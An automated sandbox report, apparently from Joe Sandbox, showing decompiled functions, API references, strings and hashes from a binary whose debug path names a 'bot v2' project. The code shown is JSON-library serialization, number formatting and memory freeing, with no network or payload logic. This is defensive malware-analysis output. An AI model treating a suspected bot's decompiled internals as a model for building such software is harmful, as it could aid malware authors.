0x0040c55f
0x0040c56a
0x0040c572
0x0040c57d
0x0040c588
0x0040c592
0x0040c5a0
0x0040c5bb
0x0040c5c3
0x0040c5d8

APIs

Part of subcall function 00421DC0: task.LIBCPMTD ref: 00421E3A
Part of subcall function 00421DC0: task.LIBCPMTD ref: 00421E42
Part of subcall function 00421DC0: task.LIBCPMTD ref: 00421E4A
Part of subcall function 00421DC0: task.LIBCPMTD ref: 00421E52

Part of subcall function 00421390: task.LIBCPMTD ref: 00421406
Part of subcall function 00421390: task.LIBCPMTD ref: 0042140E
Part of subcall function 00421390: task.LIBCPMTD ref: 00421416
Part of subcall function 00421390: task.LIBCPMTD ref: 0042141E

task.LIBCPMTD ref: 0040C544
task.LIBCPMTD ref: 0040C54C
task.LIBCPMTD ref: 0040C554
task.LIBCPMTD ref: 0040C55F
task.LIBCPMTD ref: 0040C56A
task.LIBCPMTD ref: 0040C572
task.LIBCPMTD ref: 0040C57D
task.LIBCPMTD ref: 0040C588
task.LIBCPMTD ref: 0040C5C3

Strings

parse_error, xrefs: 0040C4A5
parse error, xrefs: 0040C4B2

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: task
String ID: parse error$parse_error
API String ID: 1384045349-1820534363
Opcode ID: f02d1e7d771e689e2338f6266735761e5ffadf85fa0eea59471efb05be9dea8f
Instruction ID: 85aa30e5bd49e15b7870e31da125ab0c597f554ca59c64559a169fd42e4cd5ff
Opcode Fuzzy Hash: f02d1e7d771e689e2338f6266735761e5ffadf85fa0eea59471efb05be9dea8f
Instruction Fuzzy Hash: 124112B1D101189BCB14EFA5DC51EDEB378AF54304F5085AEF50E67142EA34AA94CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004321E8 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E004321E8(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x444d78;
				if(_t68 != 0x444d78) {
					E00432BD6(_t68);
					_t36 = _a4;
				}
				E00432BD6( *((intOrPtr*)(_t36 + 0x3c)));
				E00432BD6( *((intOrPtr*)(_a4 + 0x30)));
				E00432BD6( *((intOrPtr*)(_a4 + 0x34)));
				E00432BD6( *((intOrPtr*)(_a4 + 0x38)));
				E00432BD6( *((intOrPtr*)(_a4 + 0x28)));
				E00432BD6( *((intOrPtr*)(_a4 + 0x2c)));
				E00432BD6( *((intOrPtr*)(_a4 + 0x40)));
				E00432BD6( *((intOrPtr*)(_a4 + 0x44)));
				E00432BD6( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E00432014(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E0043207F(_t67, _t72, _t73, _t77);
			}

0x004321e8
0x004321e8
0x004321e8
0x004321ed
0x004321f3
0x004321f5
0x004321fb
0x004321fe
0x00432203
0x00432206
0x0043220a
0x00432215
0x00432220
0x0043222b
0x00432236
0x00432241
0x0043224c
0x00432257
0x00432265
0x00432270
0x00432278
0x00432279
0x0043227c
0x00432282
0x00432286
0x0043228a
0x0043228b
0x00432295
0x0043229b
0x0043229c
0x0043229f
0x004322a5
0x004322a9
0x004322ad
0x004322b4

APIs

_free.LIBCMT ref: 004321FE

Part of subcall function 00432BD6: RtlFreeHeap.NTDLL(00000000,00000000,?,00431C11), ref: 00432BEC
Part of subcall function 00432BD6: GetLastError.KERNEL32(?,?,00431C11), ref: 00432BFE

_free.LIBCMT ref: 0043220A
_free.LIBCMT ref: 00432215
_free.LIBCMT ref: 00432220
_free.LIBCMT ref: 0043222B
_free.LIBCMT ref: 00432236
_free.LIBCMT ref: 00432241
_free.LIBCMT ref: 0043224C
_free.LIBCMT ref: 00432257
_free.LIBCMT ref: 00432265

Strings

xMD, xrefs: 004321F5

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: xMD
API String ID: 776569668-2445628475
Opcode ID: 46267e3236b406a210c41f61e9da4f19304b073a257d113b65e88c0b64f167a8
Instruction ID: 7b9152acb54a7f7648b73faf41e787636da9e2eea006cca319b0779f5ba7e02d
Opcode Fuzzy Hash: 46267e3236b406a210c41f61e9da4f19304b073a257d113b65e88c0b64f167a8
Instruction Fuzzy Hash: C021ED7690010CAFCB01EF95DA41DDE7BB8BF0C344F00516AF5159B161EBB9EA84CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0041DB61 Relevance: 16.1, APIs: 2, Strings: 7, Instructions: 347
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041DB61(void* __edi, void* __esi) {
				void* _t197;
				void* _t412;
				void* _t413;
				void* _t414;

				_t413 = __esi;
				_t412 = __edi;
				if(( *(_t414 + 0xc) & 0x000000ff) == 0) {
					 *((intOrPtr*)(_t414 - 0xe4)) = E004061D0( *((intOrPtr*)(_t414 - 4)));
					 *((intOrPtr*)(_t414 - 0x230)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t414 - 0xe4)))) + 4));
					 *((intOrPtr*)(_t414 - 0x230))("{\"bytes\":[", 0xa);
					if((E0041ED90( *((intOrPtr*)( *((intOrPtr*)(_t414 + 8)) + 8))) & 0x000000ff) == 0) {
						 *((intOrPtr*)(_t414 - 0x234)) =  *((intOrPtr*)( *((intOrPtr*)(_t414 + 8)) + 8));
						E0041B070( *((intOrPtr*)(_t414 - 0x234)), _t414 - 0x30);
						while(1) {
							 *((intOrPtr*)(_t414 - 0x238)) =  *((intOrPtr*)( *((intOrPtr*)(_t414 + 8)) + 8));
							 *((intOrPtr*)(_t414 - 0x23c)) = E0041B0B0( *((intOrPtr*)(_t414 - 0x238)), _t414 - 0x290);
							if((E00417100(_t414 - 0x30, E00417990( *((intOrPtr*)(_t414 - 0x23c)), _t414 - 0x294, 1)) & 0x000000ff) == 0) {
								break;
							}
							E0040CC30( *((intOrPtr*)(_t414 - 4)), _t412, _t413,  *(E00417420(_t414 - 0x30)) & 0x000000ff);
							 *((intOrPtr*)(_t414 - 0xe8)) = E004061D0( *((intOrPtr*)(_t414 - 4)));
							 *((intOrPtr*)(_t414 - 0x240)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t414 - 0xe8))))));
							 *((intOrPtr*)(_t414 - 0x240))(0x2c);
							E004176E0(_t414 - 0x30);
						}
						E0040CC30( *((intOrPtr*)(_t414 - 4)), _t412, _t413,  *(E0041AC30( *((intOrPtr*)( *((intOrPtr*)(_t414 + 8)) + 8)))) & 0x000000ff);
					}
					 *((intOrPtr*)(_t414 - 0xec)) = E004061D0( *((intOrPtr*)(_t414 - 4)));
					 *((intOrPtr*)(_t414 - 0x244)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t414 - 0xec)))) + 4));
					 *((intOrPtr*)(_t414 - 0x244))("],\"subtype\":", 0xc);
					_t385 =  *((intOrPtr*)(_t414 + 8));
					if((E00420990( *((intOrPtr*)( *((intOrPtr*)(_t414 + 8)) + 8))) & 0x000000ff) == 0) {
						 *((intOrPtr*)(_t414 - 0xf4)) = E004061D0( *((intOrPtr*)(_t414 - 4)));
						 *((intOrPtr*)(_t414 - 0x24c)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t414 - 0xf4)))) + 4));
						_t197 =  *((intOrPtr*)(_t414 - 0x24c))("null}", 5);
					} else {
						E0040D110( *((intOrPtr*)(_t414 - 4)), _t412, _t413, E004243D0( *((intOrPtr*)( *((intOrPtr*)(_t414 + 8)) + 8))), _t385);
						 *((intOrPtr*)(_t414 - 0xf0)) = E004061D0( *((intOrPtr*)(_t414 - 4)));
						 *((intOrPtr*)(_t414 - 0x248)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t414 - 0xf0))))));
						_t197 =  *((intOrPtr*)(_t414 - 0x248))(0x7d);
					}
				} else {
					 *((intOrPtr*)(_t414 - 0xb8)) = E004061D0( *((intOrPtr*)(_t414 - 4)));
					 *((intOrPtr*)(_t414 - 0x1e8)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t414 - 0xb8)))) + 4));
					 *((intOrPtr*)(_t414 - 0x1e8))(0x441274, 2);
					 *((intOrPtr*)(_t414 - 0x2c)) =  *((intOrPtr*)(_t414 + 0x18)) +  *((intOrPtr*)(_t414 + 0x14));
					if(E00420EE0( *((intOrPtr*)(_t414 - 4)) + 0x250) <  *((intOrPtr*)(_t414 - 0x2c))) {
						 *((intOrPtr*)(_t414 - 0x1ec)) =  *((intOrPtr*)(_t414 - 4)) + 0x250;
						E00422470( *((intOrPtr*)(_t414 - 0x1ec)), E00420EE0( *((intOrPtr*)(_t414 - 4)) + 0x250) << 1, 0x20);
					}
					 *((intOrPtr*)(_t414 - 0xbc)) = E004061D0( *((intOrPtr*)(_t414 - 4)));
					 *((intOrPtr*)(_t414 - 0x1f4)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t414 - 0xbc)))) + 4));
					 *((intOrPtr*)(_t414 - 0x1f0)) = E0041AF80( *((intOrPtr*)(_t414 - 4)) + 0x250);
					 *((intOrPtr*)(_t414 - 0x1f4))( *((intOrPtr*)(_t414 - 0x1f0)),  *((intOrPtr*)(_t414 - 0x2c)));
					 *((intOrPtr*)(_t414 - 0xc0)) = E004061D0( *((intOrPtr*)(_t414 - 4)));
					 *((intOrPtr*)(_t414 - 0x1f8)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t414 - 0xc0)))) + 4));
					 *((intOrPtr*)(_t414 - 0x1f8))("\"bytes\": [", 0xa);
					if((E0041ED90( *((intOrPtr*)( *((intOrPtr*)(_t414 + 8)) + 8))) & 0x000000ff) == 0) {
						 *((intOrPtr*)(_t414 - 0x1fc)) =  *((intOrPtr*)( *((intOrPtr*)(_t414 + 8)) + 8));
						E0041B070( *((intOrPtr*)(_t414 - 0x1fc)), _t414 - 0x28);
						while(1) {
							 *((intOrPtr*)(_t414 - 0x200)) =  *((intOrPtr*)( *((intOrPtr*)(_t414 + 8)) + 8));
							 *((intOrPtr*)(_t414 - 0x204)) = E0041B0B0( *((intOrPtr*)(_t414 - 0x200)), _t414 - 0x288);
							if((E00417100(_t414 - 0x28, E00417990( *((intOrPtr*)(_t414 - 0x204)), _t414 - 0x28c, 1)) & 0x000000ff) == 0) {
								break;
							}
							E0040CC30( *((intOrPtr*)(_t414 - 4)), _t412, _t413,  *(E00417420(_t414 - 0x28)) & 0x000000ff);
							 *((intOrPtr*)(_t414 - 0xc4)) = E004061D0( *((intOrPtr*)(_t414 - 4)));
							 *((intOrPtr*)(_t414 - 0x208)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t414 - 0xc4)))) + 4));
							 *((intOrPtr*)(_t414 - 0x208))(", ", 2);
							E004176E0(_t414 - 0x28);
						}
						E0040CC30( *((intOrPtr*)(_t414 - 4)), _t412, _t413,  *(E0041AC30( *((intOrPtr*)( *((intOrPtr*)(_t414 + 8)) + 8)))) & 0x000000ff);
					}
					 *((intOrPtr*)(_t414 - 0xc8)) = E004061D0( *((intOrPtr*)(_t414 - 4)));
					 *((intOrPtr*)(_t414 - 0x20c)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t414 - 0xc8)))) + 4));
					 *((intOrPtr*)(_t414 - 0x20c))("],\n", 3);
					 *((intOrPtr*)(_t414 - 0xcc)) = E004061D0( *((intOrPtr*)(_t414 - 4)));
					 *((intOrPtr*)(_t414 - 0x214)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t414 - 0xcc)))) + 4));
					 *((intOrPtr*)(_t414 - 0x210)) = E0041AF80( *((intOrPtr*)(_t414 - 4)) + 0x250);
					 *((intOrPtr*)(_t414 - 0x214))( *((intOrPtr*)(_t414 - 0x210)),  *((intOrPtr*)(_t414 - 0x2c)));
					 *((intOrPtr*)(_t414 - 0xd0)) = E004061D0( *((intOrPtr*)(_t414 - 4)));
					 *((intOrPtr*)(_t414 - 0x218)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t414 - 0xd0)))) + 4));
					 *((intOrPtr*)(_t414 - 0x218))("\"subtype\": ", 0xb);
					if((E00420990( *((intOrPtr*)( *((intOrPtr*)(_t414 + 8)) + 8))) & 0x000000ff) == 0) {
						 *((intOrPtr*)(_t414 - 0xd4)) = E004061D0( *((intOrPtr*)(_t414 - 4)));
						 *((intOrPtr*)(_t414 - 0x21c)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t414 - 0xd4)))) + 4));
						 *((intOrPtr*)(_t414 - 0x21c))("null", 4);
					} else {
						E0040D110( *((intOrPtr*)(_t414 - 4)), _t412, _t413, E004243D0( *((intOrPtr*)( *((intOrPtr*)(_t414 + 8)) + 8))),  *((intOrPtr*)(_t414 + 8)));
					}
					 *((intOrPtr*)(_t414 - 0xd8)) = E004061D0( *((intOrPtr*)(_t414 - 4)));
					 *((intOrPtr*)(_t414 - 0x220)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t414 - 0xd8))))));
					 *((intOrPtr*)(_t414 - 0x220))(0xa);
					 *((intOrPtr*)(_t414 - 0xdc)) = E004061D0( *((intOrPtr*)(_t414 - 4)));
					 *((intOrPtr*)(_t414 - 0x228)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t414 - 0xdc)))) + 4));
					 *((intOrPtr*)(_t414 - 0x224)) = E0041AF80( *((intOrPtr*)(_t414 - 4)) + 0x250);
					 *((intOrPtr*)(_t414 - 0x228))( *((intOrPtr*)(_t414 - 0x224)),  *((intOrPtr*)(_t414 + 0x18)));
					 *((intOrPtr*)(_t414 - 0xe0)) = E004061D0( *((intOrPtr*)(_t414 - 4)));
					 *((intOrPtr*)(_t414 - 0x22c)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t414 - 0xe0))))));
					_t197 =  *((intOrPtr*)(_t414 - 0x22c))(0x7d);
				}
				return _t197;
			}

0x0041db61
0x0041db61
0x0041db67
0x0041df05
0x0041df16
0x0041df29
0x0041df3f
0x0041df4b
0x0041df5b
0x0041df6a
0x0041df70
0x0041df88
0x0041dfb0
0x00000000
0x00000000
0x0041dfc3
0x0041dfd0
0x0041dfe0
0x0041dfee
0x0041df65
0x0041df65
0x0041e00d
0x0041e00d
0x0041e01a
0x0041e02b
0x0041e03e
0x0041e044
0x0041e054
0x0041e0a1
0x0041e0b2
0x0041e0c5
0x0041e056
0x0041e066
0x0041e073
0x0041e083
0x0041e091
0x0041e091
0x0041db6d
0x0041db75
0x0041db86
0x0041db99
0x0041dba5
0x0041dbb9
0x0041dbc4
0x0041dbe3
0x0041dbe3
0x0041dbf0
0x0041dc01
0x0041dc15
0x0041dc2c
0x0041dc3a
0x0041dc4b
0x0041dc5e
0x0041dc74
0x0041dc80
0x0041dc90
0x0041dc9f
0x0041dca5
0x0041dcbd
0x0041dce5
0x00000000
0x00000000
0x0041dcf8
0x0041dd05
0x0041dd16
0x0041dd29
0x0041dc9a
0x0041dc9a
0x0041dd48
0x0041dd48
0x0041dd55
0x0041dd66
0x0041dd79
0x0041dd87
0x0041dd98
0x0041ddac
0x0041ddc3
0x0041ddd1
0x0041dde2
0x0041ddf5
0x0041de0b
0x0041de2c
0x0041de3d
0x0041de50
0x0041de0d
0x0041de1d
0x0041de1d
0x0041de5e
0x0041de6e
0x0041de7c
0x0041de8a
0x0041de9b
0x0041deaf
0x0041dec6
0x0041ded4
0x0041dee4
0x0041def2
0x0041def2
0x0041e219

APIs

Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 0041DCDB
Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 0041DFA6

Strings

"bytes": [, xrefs: 0041DC53
null}, xrefs: 0041E0BA
"subtype": , xrefs: 0041DDEA
null, xrefs: 0041DE45
],"subtype":, xrefs: 0041E033
{"bytes":[, xrefs: 0041DF1E
],, xrefs: 0041DD6E

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Affinity::operator!=Concurrency::details::Hardware
String ID: "bytes": [$"subtype": $],$],"subtype":$null$null}${"bytes":[
API String ID: 264382594-3853568864
Opcode ID: ec362840cfacfbb30ef46e7fa0c2edae03ceda604cb42ef8eec5cf715f08fcbe
Instruction ID: 61372282d0201786309d2bab213db30adc13a82503751f843b07e1889309340c
Opcode Fuzzy Hash: ec362840cfacfbb30ef46e7fa0c2edae03ceda604cb42ef8eec5cf715f08fcbe
Instruction Fuzzy Hash: 86F1C474A002299FDB18DF55CD95BADB7B1BF88304F1081EAE50A6B3A1CB346E81DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00420430 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 320
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00420430(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, char _a16, char _a32, signed int _a48, signed int _a52, signed int _a56) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v64;
				signed int _v68;
				char _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				signed int _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				signed int _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				char _v136;
				char _v152;
				intOrPtr* _t165;
				intOrPtr* _t168;
				signed int _t175;
				signed int _t201;
				void* _t207;
				signed int _t210;
				intOrPtr _t250;
				signed int _t278;
				signed int _t280;
				signed int _t281;
				intOrPtr _t288;
				void* _t315;
				void* _t317;
				void* _t318;
				void* _t326;

				_t314 = __esi;
				_t313 = __edi;
				_t268 = __edx;
				_t224 = __ebx;
				_t321 = _a56 - 0xffffffc4;
				if(_a56 < 0xffffffc4) {
					_push(0x3cc9);
					E00430DB7(__ebx, __edx, __edi, __esi, _t321, L"M_plus.e >= kAlpha", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
					_t315 = _t315 + 0xc;
				}
				_t322 = _a56 - 0xffffffe0;
				if(_a56 > 0xffffffe0) {
					_push(0x3cca);
					E00430DB7(_t224, _t268, _t313, _t314, _t322, L"M_plus.e <= kGamma", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
					_t315 = _t315 + 0xc;
				}
				_t165 = E00424330(_t224, _t313, _t314,  &_v136,  &_a48,  &_a16);
				_v20 =  *_t165;
				_v16 =  *((intOrPtr*)(_t165 + 4));
				_t168 = E00424330(_t224, _t313, _t314,  &_v152,  &_a48,  &_a32);
				_t317 = _t315 + 0x18;
				_v40 =  *_t168;
				_v36 =  *((intOrPtr*)(_t168 + 4));
				E00416200( &_v72, E00424A10(1,  ~_a56, 0), 0, _a56);
				_v24 = E00424B20(_a48,  ~_v64, _a52);
				asm("sbb edx, 0x0");
				_t276 = _v68 & _a52;
				_v12 = _v72 - 0x00000001 & _a48;
				_v8 = _v68 & _a52;
				_t323 = _v24;
				if(_v24 <= 0) {
					_push(0x3cdf);
					E00430DB7(_t224, _t276, _t313, _t314, _t323, L"p1 > 0", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
					_t317 = _t317 + 0xc;
				}
				_v28 = 0;
				_t175 = E0041F900(_v24,  &_v28);
				_t318 = _t317 + 8;
				_v84 = _t175;
				_t176 = _v84;
				_v32 = _v84;
				while(_v32 > 0) {
					_v48 = _v24 / _v28;
					_t201 = _v24;
					_t297 = _t201 % _v28;
					_v88 = _t201 % _v28;
					_t325 = _v48 - 9;
					if(_v48 > 9) {
						_push(0x3d03);
						E00430DB7(_t224, _t297, _t313, _t314, _t325, L"d <= 9", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
						_t318 = _t318 + 0xc;
					}
					 *((char*)(_a4 +  *_a8)) = _v48 + 0x30;
					 *_a8 =  *_a8 + 1;
					_v24 = _v88;
					_v32 = _v32 - 1;
					_t207 = E00424A10(_v24,  ~_v64, 0);
					asm("adc edx, [ebp-0x4]");
					_v56 = _t207 + _v12;
					_v52 = 0;
					_t326 = _v52 - _v16;
					if(_t326 > 0 || _t326 >= 0 && _v56 > _v20) {
						_t210 = _v28;
						_t176 = _t210 / 0xa;
						_v28 = _t210 / 0xa;
						continue;
					} else {
						 *_a12 =  *_a12 + _v32;
						_v96 = E00424A10(_v28,  ~_v64, 0);
						_v92 = 0;
						return E004207F0( *_a8, _a4,  *_a8, _v40, _v36, _v20, _v16, _v56, _v52, _v96, _v92);
					}
				}
				_t278 = _v8;
				__eflags = _t278 - _v16;
				if(__eflags > 0) {
					L19:
					_v44 = 0;
					while(1) {
						_v104 = E00424A30(E00420F40(_t176, _t278), _t278, 0xa, 0);
						_v100 = _t278;
						_t279 = _v8;
						__eflags = _v8 - _v100;
						if(__eflags < 0) {
							goto L24;
						}
						if(__eflags > 0) {
							L23:
							_push(0x3d65);
							E00430DB7(_t224, _t279, _t313, _t314, __eflags, L"p2 <= (std::numeric_limits<std::uint64_t>::max)() / 10", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
							_t318 = _t318 + 0xc;
							goto L24;
						}
						__eflags = _v12 - _v104;
						if(__eflags <= 0) {
							goto L24;
						}
						goto L23;
						L24:
						_t280 = _v8;
						_v12 = E00424910(_v12, _t280, 0xa, 0);
						_v8 = _t280;
						_t281 = _v8;
						_v80 = E00424B20(_v12,  ~_v64, _t281);
						_v76 = _t281;
						asm("sbb edx, 0x0");
						_t283 = _v68 & _v8;
						_v112 = _v72 - 0x00000001 & _v12;
						_v108 = _v68 & _v8;
						__eflags = _v76;
						if(__eflags > 0) {
							L26:
							_push(0x3d6e);
							E00430DB7(_t224, _t283, _t313, _t314, __eflags, L"d <= 9", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
							_t318 = _t318 + 0xc;
							L27:
							 *((char*)(_a4 +  *_a8)) = _v80 + 0x30;
							 *_a8 =  *_a8 + 1;
							_v12 = _v112;
							_v8 = _v108;
							_t288 = _v44 + 1;
							_v44 = _t288;
							_v20 = E00424910(_v20, _v16, 0xa, 0);
							_v16 = _t288;
							_t278 = _v36;
							_v40 = E00424910(_v40, _t278, 0xa, 0);
							_v36 = _t278;
							__eflags = _v8 - _v16;
							if(__eflags > 0) {
								L31:
								continue;
							}
							if(__eflags < 0) {
								L30:
								_t250 =  *_a12 - _v44;
								__eflags = _t250;
								 *_a12 = _t250;
								_v120 = _v72;
								_v116 = _v68;
								return E004207F0( *_a8, _a4,  *_a8, _v40, _v36, _v20, _v16, _v12, _v8, _v120, _v116);
							}
							_t278 = _v12;
							__eflags = _t278 - _v20;
							if(_t278 > _v20) {
								goto L31;
							}
							goto L30;
						}
						__eflags = _v80 - 9;
						if(__eflags <= 0) {
							goto L27;
						}
						goto L26;
					}
				}
				if(__eflags < 0) {
					L18:
					_push(0x3d5a);
					_t176 = E00430DB7(_t224, _t278, _t313, _t314, __eflags, L"p2 > delta", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
					_t318 = _t318 + 0xc;
					goto L19;
				}
				_t176 = _v12;
				__eflags = _v12 - _v20;
				if(__eflags > 0) {
					goto L19;
				}
				goto L18;
			}

0x00420430
0x00420430
0x00420430
0x00420430
0x00420439
0x0042043d
0x0042043f
0x0042044e
0x00420453
0x00420453
0x00420456
0x0042045a
0x0042045c
0x0042046b
0x00420470
0x00420470
0x00420482
0x0042048f
0x00420492
0x004204a4
0x004204a9
0x004204b1
0x004204b4
0x004204d1
0x004204e6
0x004204f2
0x004204f8
0x004204fb
0x004204fe
0x00420501
0x00420505
0x00420507
0x00420516
0x0042051b
0x0042051b
0x0042051e
0x0042052d
0x00420532
0x00420535
0x00420538
0x0042053b
0x0042053e
0x00420550
0x00420553
0x00420558
0x0042055b
0x0042055e
0x00420562
0x00420564
0x00420573
0x00420578
0x00420578
0x00420589
0x00420597
0x0042059c
0x004205a5
0x004205b2
0x004205ba
0x004205bd
0x004205c0
0x004205c6
0x004205c9
0x0042062e
0x00420638
0x0042063a
0x00000000
0x004205d5
0x004205e0
0x004205f1
0x004205f4
0x00000000
0x00420626
0x004205c9
0x00420642
0x00420645
0x00420648
0x0042066b
0x0042066b
0x00420672
0x00420682
0x00420685
0x00420688
0x0042068b
0x0042068e
0x00000000
0x00000000
0x00420690
0x0042069a
0x0042069a
0x004206a9
0x004206ae
0x00000000
0x004206ae
0x00420695
0x00420698
0x00000000
0x00000000
0x00000000
0x004206b1
0x004206b5
0x004206c2
0x004206c5
0x004206d0
0x004206d8
0x004206db
0x004206e7
0x004206ed
0x004206f0
0x004206f3
0x004206f6
0x004206fa
0x00420702
0x00420702
0x00420711
0x00420716
0x00420719
0x00420727
0x00420735
0x0042073d
0x00420740
0x00420746
0x00420749
0x0042075d
0x00420760
0x00420767
0x00420774
0x00420777
0x0042077d
0x00420780
0x0042078e
0x00000000
0x0042078e
0x00420782
0x0042078c
0x00420798
0x00420798
0x0042079e
0x004207a6
0x004207a9
0x00000000
0x004207db
0x00420784
0x00420787
0x0042078a
0x00000000
0x00000000
0x00000000
0x0042078a
0x004206fc
0x00420700
0x00000000
0x00000000
0x00000000
0x00420700
0x00420672
0x0042064a
0x00420654
0x00420654
0x00420663
0x00420668
0x00000000
0x00420668
0x0042064c
0x0042064f
0x00420652
0x00000000
0x00000000
0x00000000

APIs

__aulldiv.LIBCMT ref: 0042067D

Strings

p2 > delta, xrefs: 0042065E
M_plus.e <= kGamma, xrefs: 00420466
p2 <= (std::numeric_limits<std::uint64_t>::max)() / 10, xrefs: 004206A4
M_plus.e >= kAlpha, xrefs: 00420449
C:\Users\root\Desktop\bot v2\json.hpp, xrefs: 00420444, 00420461, 0042050C, 00420569, 00420659, 0042069F, 00420707
p1 > 0, xrefs: 00420511
d <= 9, xrefs: 0042056E, 0042070C

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: __aulldiv
String ID: C:\Users\root\Desktop\bot v2\json.hpp$M_plus.e <= kGamma$M_plus.e >= kAlpha$d <= 9$p1 > 0$p2 <= (std::numeric_limits<std::uint64_t>::max)() / 10$p2 > delta
API String ID: 3732870572-883716621
Opcode ID: 15468a27acb99ff90e9635c6f89fd0cab32dc329c26489ebedbb1840a067ad8f
Instruction ID: 0f11024a28d4004f973f67048eef0b065833eb80037476050b86472be08f6d97
Opcode Fuzzy Hash: 15468a27acb99ff90e9635c6f89fd0cab32dc329c26489ebedbb1840a067ad8f
Instruction Fuzzy Hash: 5AD117B4E00218EFDB04DF99E981A9EB7F5FF88300F60815AE509A7355D734AA41CF58

Uniqueness

Uniqueness Score: -1.00%

